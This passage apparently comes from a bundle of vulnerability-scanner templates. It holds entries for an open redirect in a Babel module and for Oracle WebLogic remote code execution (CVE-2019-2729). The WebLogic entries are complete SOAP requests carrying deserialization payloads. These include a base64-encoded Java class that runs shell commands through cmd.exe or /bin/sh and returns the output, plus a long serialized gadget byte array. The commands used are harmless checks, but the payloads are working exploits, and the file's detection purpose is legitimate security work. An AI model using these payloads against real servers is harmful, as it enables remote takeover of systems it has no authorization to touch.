index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void 